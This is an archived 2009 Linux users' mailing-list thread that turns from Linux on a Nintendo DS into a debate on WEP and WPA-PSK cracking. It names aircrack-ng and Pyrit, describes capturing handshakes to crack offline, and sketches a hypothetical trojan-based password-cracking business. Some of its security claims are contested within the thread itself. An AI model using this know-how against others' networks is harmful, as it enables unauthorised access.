Re: running Linux on odd devices is SOOO COOL!

2009-11-15 Thread Steven A. DuChene 
dslinux.org

Wiki:  dslinux.org/wiki
Forums: dslinux.org/f0rums   (yes, the word forums but spelled
   with a zero in place of the "o")

-Original Message-
>From: Stephen 
>Sent: Nov 15, 2009 6:54 PM
>To: "Steven A. DuChene" , Main PLUG discussion 
>list 
>Subject: Re: running Linux on odd devices is SOOO COOL!
>
>link link link!
>
>On Fri, Nov 13, 2009 at 10:34 PM, Steven A. DuChene
> wrote:
>> So I am running a special version of Linux on my son's Nintendo DS Lite 
>> handheld game console!
>>
>> It is so cool!
>>
>>
>> ---
>> PLUG-discuss mailing list - PLUG-discuss@lists.plug.phoenix.az.us
>> To subscribe, unsubscribe, or to change your mail settings:
>> http://lists.PLUG.phoenix.az.us/mailman/listinfo/plug-discuss
>>
>
>
>
>-- 
>A mouse trap, placed on top of your alarm clock, will prevent you from
>rolling over and going back to sleep after you hit the snooze button.
>
>Stephen



---
PLUG-discuss mailing list - PLUG-discuss@lists.plug.phoenix.az.us
To subscribe, unsubscribe, or to change your mail settings:
http://lists.PLUG.phoenix.az.us/mailman/listinfo/plug-discuss

Re: running Linux on odd devices is SOOO COOL!

2009-11-15 Thread Stephen 
link link link!

On Fri, Nov 13, 2009 at 10:34 PM, Steven A. DuChene
 wrote:
> So I am running a special version of Linux on my son's Nintendo DS Lite 
> handheld game console!
>
> It is so cool!
>
>
> ---
> PLUG-discuss mailing list - PLUG-discuss@lists.plug.phoenix.az.us
> To subscribe, unsubscribe, or to change your mail settings:
> http://lists.PLUG.phoenix.az.us/mailman/listinfo/plug-discuss
>



-- 
A mouse trap, placed on top of your alarm clock, will prevent you from
rolling over and going back to sleep after you hit the snooze button.

Stephen
---
PLUG-discuss mailing list - PLUG-discuss@lists.plug.phoenix.az.us
To subscribe, unsubscribe, or to change your mail settings:
http://lists.PLUG.phoenix.az.us/mailman/listinfo/plug-discuss

Re: running Linux on odd devices is SOOO COOL!

2009-11-15 Thread Kurt Granroth 
On 11/15/09 12:53 PM, Lisa Kachold wrote:
> I guess I still disagree with your use of the word 'broken'.  By that
> definition, gpg is 'broken' as well as *any* encryption system that uses
> passwords.  Just because because you can brute force a crack doesn't
> mean that the protocol broken.
>
> And as far as 'eventually' goes... according to the people at
> ElectricalAlchemy, a 12 character random password would take 28 TRILLION
> hours of computing power (defined as 'high-CPU on Amazon EC2').  Let's
> say that you can wrangle up 10,000 systems to work on this
> simultaneously.  It would still take over 300,000 YEARS to brute
> force it.
>
>
> Actually no; it would with current CUDA NVidia and faster processor
> techniques take at most 60 days.
>
> http://pyrit.wordpress.com/the-twilight-of-wi-fi-protected-access/
>
> Let's imagine I drive over to a well known corporation with WiFi (or
> target you and your networks); I can obtain sufficient information in
> less than 5 minutes; take it home and start the work.  Once I get the
> Pairwise Master Key - additional auth (captured in the stream) is trivial.

Thanks for the links to Pyrit; I hadn't heard of that project before. 
Very interesting stuff!

So in addition to using GPUs and multi-core systems, they also 
apparently are creating something like rainbow tables for common network 
names.  Clever.

BUT.. I'm still not seeing where you are getting the 'at most 60 days' 
figure.  The only figures that that blog entry talks about refers to 8 
char passwords with common network names.

That's not at all what I'm dealing with, here.  Since the Pairwise 
Master Key is constructed of the network name PLUS the password, in 
reality, the true password that needs brute-forcing is the combination 
of both if the network name isn't common.  In my case, I have my 20-odd 
char password plus nearly 15 char (very non-common) network name. 
That's equivalent to a 35 char randomized full-ASCII set password!  I 
have serious doubts that such a password could be brute forced in 60 
days, even with a cloud of GPUs.

If I'm wrong, please tell me specifically where I'm wrong.  I truly want 
to know.  But everything I've read, so far, all seems to indicate that I 
am, in fact, as safe as I thought I was.

> I feel pretty safe with a protocol that would require long than the age
> of the universe to crack!  I would NOT consider that broken :-)
>
>
> Well, evidently you are stuck in the security matrix; feels all good and
> safe in that denial?  I would challenge you to a real live test with
> your current configuration, but that work is (or was) really in your
> realm to complete right after installation; and I only pentest/crack
> with a fully signed contract or for demonstrations at PLUG HackFests for
> ITT and DeVry students at the John C. Lincoln Cowden Center.
>
> Happy wireless network sharing with smart kiddies running Backtrack4 USB
> on their NVidia gamer machines, Kurt!

If it's denial, then please let me know what I'm denying!  I've read 
everything you've provided and NOTHING in all of that is giving me any 
reason to think that my setup is any less secure than I thought at the 
outset of this discussion.

Also, FWIW, I'm not a sys-admin so this network is just my home wireless 
LAN.

> Radius is actually very trivial to run on Linux, and if you want to be
> really secure, it's especially easy to implement via SSO with sLDAP to a
> shared intregration of Active Directory (where the Microsoft desktop
> staff maintain the users).

Yep.  That's what we use at work.  It would be irresponsible for any 
company to NOT use Radius given its advantages.
---
PLUG-discuss mailing list - PLUG-discuss@lists.plug.phoenix.az.us
To subscribe, unsubscribe, or to change your mail settings:
http://lists.PLUG.phoenix.az.us/mailman/listinfo/plug-discuss

Re: running Linux on odd devices is SOOO COOL!

2009-11-15 Thread Kurt Granroth 
On 11/15/09 10:56 AM, Alex Dean wrote:
> Kurt : Is that "28 trillion hours" figure you cited the estimated time
> to try *all* 12 character passwords? If so, I think that's not the right
> metric. The search for a password stops once you've found the correct
> one, and you'd only try them all if the correct password is the very
> last one you tried. It'd be helpful to know something like "I'm able to
> attempt 95% of all 12 character passwords after 28 trillion hours". If
> the password is truly a random string of junk, it's perfectly possible
> (just phenomenally unlikely) that you'll guess it on the 1st try.

Any figures citing regarding brute force attacks are necessarily the 
worst case scenario.  That is, if you had to to through the entire 
solution set, how long would it take?

Obviously, any real attack would take some amount of time less than 
that.  You could even guess it completely by accident on the first try 
making the "28 trillion hours" estimate come out to "less than one 
second" for that password.

The reason that the upper figure is always quoted, though, is that is 
the only one that matters if you are going to try to brute force a 
password.  Since it *can* take that long, you must assume that it *will* 
take that long or else you are being foolishly optimistic.  The odds are 
solidly in favor of it taking very close to that amount of time.
---
PLUG-discuss mailing list - PLUG-discuss@lists.plug.phoenix.az.us
To subscribe, unsubscribe, or to change your mail settings:
http://lists.PLUG.phoenix.az.us/mailman/listinfo/plug-discuss

Re: running Linux on odd devices is SOOO COOL!

2009-11-15 Thread Technomage 
Robert Holtzman wrote:
>
> I was just about to comment on this. You beat me to it. In all the
> different material I've read, everyone is fond of saying it would
> take  of years to break a strong password. 
> Statistically the odds of the first try being successful are not, as you
> pointed out, zero and increase with each combination. Granted, it would
> still take a hell of a long time but not the  years
> people always claim.   
>   
you are not the only ones to notice this.
perhaps a better metric would be the :odds of determining the actual 
password in a
"reasonably short period" of time (say under 3 months). Now, I don't 
have the math behind me
to even approach this problem. However, wouldn't similar large math 
problems (such as calculating
the ofdds of a specific set of balls dropping for the powerball lotto 
that week) given you a better metric
of how to calculate probability of success?


---
PLUG-discuss mailing list - PLUG-discuss@lists.plug.phoenix.az.us
To subscribe, unsubscribe, or to change your mail settings:
http://lists.PLUG.phoenix.az.us/mailman/listinfo/plug-discuss

Re: running Linux on odd devices is SOOO COOL!

2009-11-15 Thread Jason Spatafore 
On Sun, 2009-11-15 at 13:22 -0700, Robert Holtzman wrote:
> I was just about to comment on this. You beat me to it. In all the
> different material I've read, everyone is fond of saying it would
> take  of years to break a strong password. 
> Statistically the odds of the first try being successful are not, as
> you
> pointed out, zero and increase with each combination. Granted, it
> would
> still take a hell of a long time but not the 
> years
> people always claim.   

On top of that, people don't take into account how exponential
inventions reduce that time dramatically.

Okay, let's say it takes 300,000 years to crack a password. That's 1
system...running for 300,000 years.

Now, use the Seti project with distributed computing and hide it inside
of a "useful" application. Do you really think it will take long to get
1 million downloads?

So, 1 million downloads...your distributed password cracking application
is now deployed and people allowed it to connect and bypass all
firewalls because, well, it was trusted.

So, 1 million systems doing a 300,000 year task. What does that equate
to? Now think of what would happen if you got 2 million, 4 million, and
8 million computers?

In short time, you can crack that password in 1 hour. NOW, what if you
made a business out of cracking passwords for the bad guys? 24 passwords
per day...selling at $3,000 a password...think about how good of a life
you can have making $26,280,000 / year for writing a piece of software?
Do you really think it will be hard to pay off a couple network
administrators to mask your IP? Say you pay them 50k each and you need
20 of them...that's only $2mil you give up a year. You're still netting
$24 mil. You do it for one year, you never work again.

Just think of the scenario...and remember, humans are the weakest link
in the whole chain.

Oh, and the scary part...reduce that price per password to $300.00..you
make less money, but you just increased your client base immensely.

It's a scary thought. BUT, ultimately, all this does is make people
think "Then what good is it to fight? I'll just leave admin/admin as my
router password. No use in trying to beat it."


---
PLUG-discuss mailing list - PLUG-discuss@lists.plug.phoenix.az.us
To subscribe, unsubscribe, or to change your mail settings:
http://lists.PLUG.phoenix.az.us/mailman/listinfo/plug-discuss

Re: running Linux on odd devices is SOOO COOL!

2009-11-15 Thread Steven A. DuChene 

OK, I am going to force-ably pull this back on topic!  :-)

If anyone is interested in seeing this Nintendo DS running
Linux and wants to know how to do it, I can bring it to one
of the east side PLUG meetings and do a 5 - 10 minute talk
on the process.
--
Steven DuChene


---
PLUG-discuss mailing list - PLUG-discuss@lists.plug.phoenix.az.us
To subscribe, unsubscribe, or to change your mail settings:
http://lists.PLUG.phoenix.az.us/mailman/listinfo/plug-discuss

Re: running Linux on odd devices is SOOO COOL!

2009-11-15 Thread Robert Holtzman 
On Sun, Nov 15, 2009 at 11:56:18AM -0600, Alex Dean wrote:

 snip.

>
> Kurt : Is that "28 trillion hours" figure you cited the estimated time  
> to try *all* 12 character passwords?  If so, I think that's not the  
> right metric.  The search for a password stops once you've found the  
> correct one, and you'd only try them all if the correct password is the 
> very last one you tried.  It'd be helpful to know something like "I'm 
> able to attempt 95% of all 12 character passwords after 28 trillion 
> hours".  If the password is truly a random string of junk, it's perfectly 
> possible (just phenomenally unlikely) that you'll guess it on the 1st 
> try.

I was just about to comment on this. You beat me to it. In all the
different material I've read, everyone is fond of saying it would
take  of years to break a strong password. 
Statistically the odds of the first try being successful are not, as you
pointed out, zero and increase with each combination. Granted, it would
still take a hell of a long time but not the  years
people always claim.   

-- 
Bob Holtzman
Key ID: 8D549279
"If you think you're getting free lunch,
 check the price of the beer"


signature.asc
Description: Digital signature
---
PLUG-discuss mailing list - PLUG-discuss@lists.plug.phoenix.az.us
To subscribe, unsubscribe, or to change your mail settings:
http://lists.PLUG.phoenix.az.us/mailman/listinfo/plug-discuss

Re: running Linux on odd devices is SOOO COOL!

2009-11-15 Thread Lisa Kachold 
On Sun, Nov 15, 2009 at 9:40 AM, Kurt Granroth <
kurt+plug-disc...@granroth.com > wrote:

> On 11/15/09 5:57 AM, Lisa Kachold wrote:
> > On Saturday, November 14, 2009, Kurt Granroth
> > >
>  wrote:
> >> Lisa,
> >>
> >> I'll grant you the denial-of-service attack, but I'm still not finding
> >> any evidence that WPA is fundamentally flawed (much less "easier to
> >> crack... than WEP").
> > You simply capture the auth with airocrack-ng.
> > Even 20 characters can be decrypted eventually!  A dictionary attack
> > is faster and a truely random passwrd delays the process and  none of
> > this is any reason to not use security tools but the fact is the
> > protocol has been broken! I know I put in a nomadix and cisco aironet
> > with active directory and radius in 2003'
> > radius is anice solution; we used them for our dialup with livingstons
> > at Nike and various ISPs.
>
> I guess I still disagree with your use of the word 'broken'.  By that
> definition, gpg is 'broken' as well as *any* encryption system that uses
> passwords.  Just because because you can brute force a crack doesn't
> mean that the protocol broken.
>
> And as far as 'eventually' goes... according to the people at
> ElectricalAlchemy, a 12 character random password would take 28 TRILLION
> hours of computing power (defined as 'high-CPU on Amazon EC2').  Let's
> say that you can wrangle up 10,000 systems to work on this
> simultaneously.  It would still take over 300,000 YEARS to brute force it.
>

Actually no; it would with current CUDA NVidia and faster processor
techniques take at most 60 days.

http://pyrit.wordpress.com/the-twilight-of-wi-fi-protected-access/

Let's imagine I drive over to a well known corporation with WiFi (or target
you and your networks); I can obtain sufficient information in less than 5
minutes; take it home and start the work.  Once I get the Pairwise Master
Key - additional auth (captured in the stream) is trivial.

Now tell me truly that your Wifi configurations are:

20 character pass
truly random with upper case letters and numbers
fully tested against current crack techniques
changed every 60 days


and optimally:
on their own isolated VLAN

pyrit is a Google Code CUDA NVidia cracking utility.  Pyrit takes a step
ahead in attacking WPA-PSK and WPA2-PSK, the protocols that protect todays
public WIFI-airspace.  Pyrits implementation allows to create massive
databases, pre-computing part of the WPA/WPA2-PSK authentication phase in a
space-time-tradeoff. The performance gain for real-world-attacks is in the
range of three orders of magnitude which urges for re-consideration of the
protocols security. Exploiting the computational power of Many-Core- and
other platforms through ATI-Stream, Nvidia CUDA, OpenCL and VIA Padlock, it
is currently by far the most powerful attack against one of the worlds most
used security-protocols. For more background see this article on the
projects blog.http://code.google.com/p/pyrit/

>
> Looking at the curve, I would guess that a 20 character password would
> take well into the trillions of years (or likely more) to brute force.
> That's much older than the age of the universe!
>
> I feel pretty safe with a protocol that would require long than the age
> of the universe to crack!  I would NOT consider that broken :-)
>

Well, evidently you are stuck in the security matrix; feels all good and
safe in that denial?  I would challenge you to a real live test with your
current configuration, but that work is (or was) really in your realm to
complete right after installation; and I only pentest/crack with a fully
signed contract or for demonstrations at PLUG HackFests for ITT and DeVry
students at the John C. Lincoln Cowden Center.

Happy wireless network sharing with smart kiddies running Backtrack4 USB on
their NVidia gamer machines, Kurt!

See my other post regarding current Cisco LEAP for Microsoft A/D or Radius,
and sLDAP/Radius WPA "secure" auth implementations of Wireless networking.

Radius is actually very trivial to run on Linux, and if you want to be
really secure, it's especially easy to implement via SSO with sLDAP to a
shared intregration of Active Directory (where the Microsoft desktop staff
maintain the users).

-- 
Skype: (623)239-3392
AT&T: (503)754-4452
www.it-clowns.com
---
PLUG-discuss mailing list - PLUG-discuss@lists.plug.phoenix.az.us
To subscribe, unsubscribe, or to change your mail settings:
http://lists.PLUG.phoenix.az.us/mailman/listinfo/plug-discuss

Re: running Linux on odd devices is SOOO COOL!

2009-11-15 Thread Alex Dean 


On Nov 15, 2009, at 10:40 AM, Kurt Granroth wrote:

I feel pretty safe with a protocol that would require long than the  
age

of the universe to crack!  I would NOT consider that broken :-)


I think this is a pretty sane approach to things.  You have to think  
about likely vs. unlikely, not possible vs. impossible.


The fact that any password can be guessed eventually isn't the point.   
You just have to make it inconvenient enough for an attacker that they  
give up and go somewhere else.  Obviously that calculus is different  
when the payoff for your cracking efforts is 'taking down a power  
grid' or 'launching a missile', instead of 'free wireless access'.  To  
me, if its likely to take a cracker multiple years of concerted effort  
to break my wireless network, that's plenty for me.


Kurt : Is that "28 trillion hours" figure you cited the estimated time  
to try *all* 12 character passwords?  If so, I think that's not the  
right metric.  The search for a password stops once you've found the  
correct one, and you'd only try them all if the correct password is  
the very last one you tried.  It'd be helpful to know something like  
"I'm able to attempt 95% of all 12 character passwords after 28  
trillion hours".  If the password is truly a random string of junk,  
it's perfectly possible (just phenomenally unlikely) that you'll guess  
it on the 1st try.


Thanks for an interesting discussion.

alex


PGP.sig
Description: This is a digitally signed message part
---
PLUG-discuss mailing list - PLUG-discuss@lists.plug.phoenix.az.us
To subscribe, unsubscribe, or to change your mail settings:
http://lists.PLUG.phoenix.az.us/mailman/listinfo/plug-discuss

Re: running Linux on odd devices is SOOO COOL!

2009-11-15 Thread Kurt Granroth 
On 11/15/09 5:57 AM, Lisa Kachold wrote:
> On Saturday, November 14, 2009, Kurt Granroth
>   wrote:
>> Lisa,
>>
>> I'll grant you the denial-of-service attack, but I'm still not finding
>> any evidence that WPA is fundamentally flawed (much less "easier to
>> crack... than WEP").
> You simply capture the auth with airocrack-ng.
> Even 20 characters can be decrypted eventually!  A dictionary attack
> is faster and a truely random passwrd delays the process and  none of
> this is any reason to not use security tools but the fact is the
> protocol has been broken! I know I put in a nomadix and cisco aironet
> with active directory and radius in 2003'
> radius is anice solution; we used them for our dialup with livingstons
> at Nike and various ISPs.

I guess I still disagree with your use of the word 'broken'.  By that 
definition, gpg is 'broken' as well as *any* encryption system that uses 
passwords.  Just because because you can brute force a crack doesn't 
mean that the protocol broken.

And as far as 'eventually' goes... according to the people at 
ElectricalAlchemy, a 12 character random password would take 28 TRILLION 
hours of computing power (defined as 'high-CPU on Amazon EC2').  Let's 
say that you can wrangle up 10,000 systems to work on this 
simultaneously.  It would still take over 300,000 YEARS to brute force it.

Looking at the curve, I would guess that a 20 character password would 
take well into the trillions of years (or likely more) to brute force. 
That's much older than the age of the universe!

I feel pretty safe with a protocol that would require long than the age 
of the universe to crack!  I would NOT consider that broken :-)
---
PLUG-discuss mailing list - PLUG-discuss@lists.plug.phoenix.az.us
To subscribe, unsubscribe, or to change your mail settings:
http://lists.PLUG.phoenix.az.us/mailman/listinfo/plug-discuss

Re: running Linux on odd devices is SOOO COOL!

2009-11-15 Thread Lisa Kachold 
On Saturday, November 14, 2009, Kurt Granroth
 wrote:
> Lisa,
>
> I'll grant you the denial-of-service attack, but I'm still not finding
> any evidence that WPA is fundamentally flawed (much less "easier to
> crack... than WEP").
You simply capture the auth with airocrack-ng.
Even 20 characters can be decrypted eventually!  A dictionary attack
is faster and a truely random passwrd delays the process and  none of
this is any reason to not use security tools but the fact is the
protocol has been broken! I know I put in a nomadix and cisco aironet
with active directory and radius in 2003'
radius is anice solution; we used them for our dialup with livingstons
at Nike and various ISPs.
> I read the aircrack article earlier to see if there was new info that I
> had missed.  I also read the article you have on obnosis.com.  Finally,
> I read the LucidInteractive article you just provided.
>
> ALL of them say the same thing: the only valid attack on WPA-PSK is a
> dictionary or brute force attack!
>
> Okay, yes, it's very handy that you can do the password cracking
> offline.  But see the links I listed earlier... any decently crafted
> password will be nigh IMPOSSIBLE to crack unless you have nearly
> infinite resources -- offline or no.
>
> I realize that you likely (for sure) know more about this than I do so
> if I keep missing some fundamental flaw in PSK in all of the articles
> provided, please enlighten me!
>
> Kurt
>
> On 11/14/09 5:59 PM, Lisa Kachold wrote:
>> Kurt,
>>
>> As you stated, WPA/WPA2-PSK security is inherently flawed:
>>
>>     * One flaw allowed an attacker to cause a denial-of-service attack,
>>       if the attacker could bypass several other layers of protection.
>>     * A second flaw exists in the method with which WPA initializes its
>>       encryption scheme. Consequently, it's actually easier to crack WPA
>>       than it is to crack WEP. This flaw is the subject of this article.
>>
>>
>> A WPA key /can/ be made good enough to make cracking it unfeasible. WPA
>> is also a little more cracker friendly. By capturing the right type of
>> packets, you can do your cracking offline. This means you only have to
>> be near the AP for a matter of seconds to get what you need. WPA
>> basically comes in two flavours RADIUS or PSK. PSK is crackable, RADIUS
>> is not so much.
>>
>> /_*But how many people actually have WPA RADIUS encryption?*_/
>>
>> Here's another link that includes PSK cracking Howto:
>> http://www.aircrack-ng.org/doku.php?id=cracking_wpa
>>
>> Using airocrack-ng tools in Backtrack (per my presentation materials at
>> http://plug.phoenix.az.us show) WEP and WPA/WPA2-PSK are easy to crack.
>>
>> Does anyone here run Radius?
>>
>> Here's an accompanying document to better explain it:
>> http://docs.lucidinteractive.ca/index.php/Cracking_WEP_and_WPA_Wireless_Networks
>>
>>
>> On Sat, Nov 14, 2009 at 7:32 PM, Kurt Granroth
>> > > wrote:
>>
>>     On 11/14/09 12:02 PM, Lisa Kachold wrote:
>>      > The whole concept of "wireless encryption security" is somewhat moot
>>      > with airdump-ng etc tools.
>>      >
>>      > WEP keys are really easy to break.
>>      >
>>      > WPA is also easily encroached - but harder with a truely unique
>>     secure
>>      > key (which few people use)
>>      >
>>      > It just exists as part of the big "security" matrix to keep the
>>     honest
>>      > people out.  Crackers can get right in anyway!
>>      >
>>      > http://www.obnosis.com/Layer8Wireless.html
>>
>>     Okay, I have to take exception to how this is written.  You are
>>     comparing the security of WEP and WPA as if they are somehow equivalent
>>     or equally "easy" to crack.  That is just not true.
>>
>>     WEP is fundamentally broken.  It can be reliably cracked in seconds, in
>>     most cases.  Its use is more of a "please don't use this network" flag
>>     than any real attempt to keep people out.
>>
>>     WPA, on the other hand, is NOT broken.  Only one variation of it is
>>     crackable at all (PSK) and even then, the attack is a brute force
>>     dictionary attack.  By that argument, ALL password based encryption is
>>     crackable.
>>
>>     Yes, you could successfully argue that since MOST home APs use PSK and
>>     MOST probably just set the password to 'admin' or 'linksys' or some
>>     other trivial name, that IN PRACTICE, it's not hard to crack most uses
>>     of WPA.
>>
>>     But saying that "[c]rackers can get right in anyway" just isn't true.
>>     All that is needed is a reasonably difficult password.  Don't use a
>>     dictionary word and make it decently long and it quickly becomes far too
>>     difficult to crack to make it worth it for all but the most extreme
>>     cases.  It's either VERY expensive or takes YEARS.
>>
>>     I'm sure that you read this:
>>
>>     
>> http://news.electricalchemy.net/2009/10/password-cracking-in-cloud-part-5.html
>>
>>     It answers the question: "how much does

Re: running Linux on odd devices is SOOO COOL!

2009-11-14 Thread Kurt Granroth 
Lisa,

I'll grant you the denial-of-service attack, but I'm still not finding 
any evidence that WPA is fundamentally flawed (much less "easier to 
crack... than WEP").

I read the aircrack article earlier to see if there was new info that I 
had missed.  I also read the article you have on obnosis.com.  Finally, 
I read the LucidInteractive article you just provided.

ALL of them say the same thing: the only valid attack on WPA-PSK is a 
dictionary or brute force attack!

Okay, yes, it's very handy that you can do the password cracking 
offline.  But see the links I listed earlier... any decently crafted 
password will be nigh IMPOSSIBLE to crack unless you have nearly 
infinite resources -- offline or no.

I realize that you likely (for sure) know more about this than I do so 
if I keep missing some fundamental flaw in PSK in all of the articles 
provided, please enlighten me!

Kurt

On 11/14/09 5:59 PM, Lisa Kachold wrote:
> Kurt,
>
> As you stated, WPA/WPA2-PSK security is inherently flawed:
>
> * One flaw allowed an attacker to cause a denial-of-service attack,
>   if the attacker could bypass several other layers of protection.
> * A second flaw exists in the method with which WPA initializes its
>   encryption scheme. Consequently, it's actually easier to crack WPA
>   than it is to crack WEP. This flaw is the subject of this article.
>
>
> A WPA key /can/ be made good enough to make cracking it unfeasible. WPA
> is also a little more cracker friendly. By capturing the right type of
> packets, you can do your cracking offline. This means you only have to
> be near the AP for a matter of seconds to get what you need. WPA
> basically comes in two flavours RADIUS or PSK. PSK is crackable, RADIUS
> is not so much.
>
> /_*But how many people actually have WPA RADIUS encryption?*_/
>
> Here's another link that includes PSK cracking Howto:
> http://www.aircrack-ng.org/doku.php?id=cracking_wpa
>
> Using airocrack-ng tools in Backtrack (per my presentation materials at
> http://plug.phoenix.az.us show) WEP and WPA/WPA2-PSK are easy to crack.
>
> Does anyone here run Radius?
>
> Here's an accompanying document to better explain it:
> http://docs.lucidinteractive.ca/index.php/Cracking_WEP_and_WPA_Wireless_Networks
>
>
> On Sat, Nov 14, 2009 at 7:32 PM, Kurt Granroth
>  > wrote:
>
> On 11/14/09 12:02 PM, Lisa Kachold wrote:
>  > The whole concept of "wireless encryption security" is somewhat moot
>  > with airdump-ng etc tools.
>  >
>  > WEP keys are really easy to break.
>  >
>  > WPA is also easily encroached - but harder with a truely unique
> secure
>  > key (which few people use)
>  >
>  > It just exists as part of the big "security" matrix to keep the
> honest
>  > people out.  Crackers can get right in anyway!
>  >
>  > http://www.obnosis.com/Layer8Wireless.html
>
> Okay, I have to take exception to how this is written.  You are
> comparing the security of WEP and WPA as if they are somehow equivalent
> or equally "easy" to crack.  That is just not true.
>
> WEP is fundamentally broken.  It can be reliably cracked in seconds, in
> most cases.  Its use is more of a "please don't use this network" flag
> than any real attempt to keep people out.
>
> WPA, on the other hand, is NOT broken.  Only one variation of it is
> crackable at all (PSK) and even then, the attack is a brute force
> dictionary attack.  By that argument, ALL password based encryption is
> crackable.
>
> Yes, you could successfully argue that since MOST home APs use PSK and
> MOST probably just set the password to 'admin' or 'linksys' or some
> other trivial name, that IN PRACTICE, it's not hard to crack most uses
> of WPA.
>
> But saying that "[c]rackers can get right in anyway" just isn't true.
> All that is needed is a reasonably difficult password.  Don't use a
> dictionary word and make it decently long and it quickly becomes far too
> difficult to crack to make it worth it for all but the most extreme
> cases.  It's either VERY expensive or takes YEARS.
>
> I'm sure that you read this:
>
> 
> http://news.electricalchemy.net/2009/10/password-cracking-in-cloud-part-5.html
>
> It answers the question: "how much does it cost to crack a password?"
> It assumes that you are using Amazon EC2 at $0.30 an hour.  A twelve
> character password using the full ASCII set would cost over $8 TRILLION
> dollars to crack.  Even much smaller passwords are still in the
> millions.
>
> The password that I use on my WPA2-PSK AP is 20-odd chars long and spans
> the ASCII range.  Far from allowing crackers to "get right in", it's
> nearly impossible for them to do so.
> ---
> PLUG-discuss mailing list - PLUG-discuss@lists.plug.phoenix.az.us
>

Re: running Linux on odd devices is SOOO COOL!

2009-11-14 Thread Lisa Kachold 
Kurt,

As you stated, WPA/WPA2-PSK security is inherently flawed:


   - One flaw allowed an attacker to cause a denial-of-service attack, if
   the attacker could bypass several other layers of protection.
   - A second flaw exists in the method with which WPA initializes its
   encryption scheme. Consequently, it's actually easier to crack WPA than it
   is to crack WEP. This flaw is the subject of this article.


A WPA key *can* be made good enough to make cracking it unfeasible. WPA is
also a little more cracker friendly. By capturing the right type of packets,
you can do your cracking offline. This means you only have to be near the AP
for a matter of seconds to get what you need. WPA basically comes in two
flavours RADIUS or PSK. PSK is crackable, RADIUS is not so much.

*But how many people actually have WPA RADIUS encryption?*

Here's another link that includes PSK cracking Howto:
http://www.aircrack-ng.org/doku.php?id=cracking_wpa

Using airocrack-ng tools in Backtrack (per my presentation materials at
http://plug.phoenix.az.us show) WEP and WPA/WPA2-PSK are easy to crack.

Does anyone here run Radius?

Here's an accompanying document to better explain it:
http://docs.lucidinteractive.ca/index.php/Cracking_WEP_and_WPA_Wireless_Networks


On Sat, Nov 14, 2009 at 7:32 PM, Kurt Granroth <
kurt+plug-disc...@granroth.com > wrote:

> On 11/14/09 12:02 PM, Lisa Kachold wrote:
> > The whole concept of "wireless encryption security" is somewhat moot
> > with airdump-ng etc tools.
> >
> > WEP keys are really easy to break.
> >
> > WPA is also easily encroached - but harder with a truely unique secure
> > key (which few people use)
> >
> > It just exists as part of the big "security" matrix to keep the honest
> > people out.  Crackers can get right in anyway!
> >
> > http://www.obnosis.com/Layer8Wireless.html
>
> Okay, I have to take exception to how this is written.  You are
> comparing the security of WEP and WPA as if they are somehow equivalent
> or equally "easy" to crack.  That is just not true.
>
> WEP is fundamentally broken.  It can be reliably cracked in seconds, in
> most cases.  Its use is more of a "please don't use this network" flag
> than any real attempt to keep people out.
>
> WPA, on the other hand, is NOT broken.  Only one variation of it is
> crackable at all (PSK) and even then, the attack is a brute force
> dictionary attack.  By that argument, ALL password based encryption is
> crackable.
>
> Yes, you could successfully argue that since MOST home APs use PSK and
> MOST probably just set the password to 'admin' or 'linksys' or some
> other trivial name, that IN PRACTICE, it's not hard to crack most uses
> of WPA.
>
> But saying that "[c]rackers can get right in anyway" just isn't true.
> All that is needed is a reasonably difficult password.  Don't use a
> dictionary word and make it decently long and it quickly becomes far too
> difficult to crack to make it worth it for all but the most extreme
> cases.  It's either VERY expensive or takes YEARS.
>
> I'm sure that you read this:
>
>
> http://news.electricalchemy.net/2009/10/password-cracking-in-cloud-part-5.html
>
> It answers the question: "how much does it cost to crack a password?"
> It assumes that you are using Amazon EC2 at $0.30 an hour.  A twelve
> character password using the full ASCII set would cost over $8 TRILLION
> dollars to crack.  Even much smaller passwords are still in the millions.
>
> The password that I use on my WPA2-PSK AP is 20-odd chars long and spans
> the ASCII range.  Far from allowing crackers to "get right in", it's
> nearly impossible for them to do so.
> ---
> PLUG-discuss mailing list - PLUG-discuss@lists.plug.phoenix.az.us
> To subscribe, unsubscribe, or to change your mail settings:
> http://lists.PLUG.phoenix.az.us/mailman/listinfo/plug-discuss
>



-- 
Skype: (623)239-3392
AT&T: (503)754-4452
www.it-clowns.com
---
PLUG-discuss mailing list - PLUG-discuss@lists.plug.phoenix.az.us
To subscribe, unsubscribe, or to change your mail settings:
http://lists.PLUG.phoenix.az.us/mailman/listinfo/plug-discuss

Re: running Linux on odd devices is SOOO COOL!

2009-11-14 Thread Kurt Granroth 
On 11/14/09 12:02 PM, Lisa Kachold wrote:
> The whole concept of "wireless encryption security" is somewhat moot
> with airdump-ng etc tools.
>
> WEP keys are really easy to break.
>
> WPA is also easily encroached - but harder with a truely unique secure
> key (which few people use)
>
> It just exists as part of the big "security" matrix to keep the honest
> people out.  Crackers can get right in anyway!
>
> http://www.obnosis.com/Layer8Wireless.html

Okay, I have to take exception to how this is written.  You are 
comparing the security of WEP and WPA as if they are somehow equivalent 
or equally "easy" to crack.  That is just not true.

WEP is fundamentally broken.  It can be reliably cracked in seconds, in 
most cases.  Its use is more of a "please don't use this network" flag 
than any real attempt to keep people out.

WPA, on the other hand, is NOT broken.  Only one variation of it is 
crackable at all (PSK) and even then, the attack is a brute force 
dictionary attack.  By that argument, ALL password based encryption is 
crackable.

Yes, you could successfully argue that since MOST home APs use PSK and 
MOST probably just set the password to 'admin' or 'linksys' or some 
other trivial name, that IN PRACTICE, it's not hard to crack most uses 
of WPA.

But saying that "[c]rackers can get right in anyway" just isn't true. 
All that is needed is a reasonably difficult password.  Don't use a 
dictionary word and make it decently long and it quickly becomes far too 
difficult to crack to make it worth it for all but the most extreme 
cases.  It's either VERY expensive or takes YEARS.

I'm sure that you read this:

http://news.electricalchemy.net/2009/10/password-cracking-in-cloud-part-5.html

It answers the question: "how much does it cost to crack a password?" 
It assumes that you are using Amazon EC2 at $0.30 an hour.  A twelve 
character password using the full ASCII set would cost over $8 TRILLION 
dollars to crack.  Even much smaller passwords are still in the millions.

The password that I use on my WPA2-PSK AP is 20-odd chars long and spans 
the ASCII range.  Far from allowing crackers to "get right in", it's 
nearly impossible for them to do so.
---
PLUG-discuss mailing list - PLUG-discuss@lists.plug.phoenix.az.us
To subscribe, unsubscribe, or to change your mail settings:
http://lists.PLUG.phoenix.az.us/mailman/listinfo/plug-discuss

Re: running Linux on odd devices is SOOO COOL!

2009-11-14 Thread Lisa Kachold 
On Sat, Nov 14, 2009 at 11:43 AM, AZ RUNE  wrote:

> Buy another router and set up a 2nd network with no Internet Access to test
> it on WEP.
>
> Brian
>

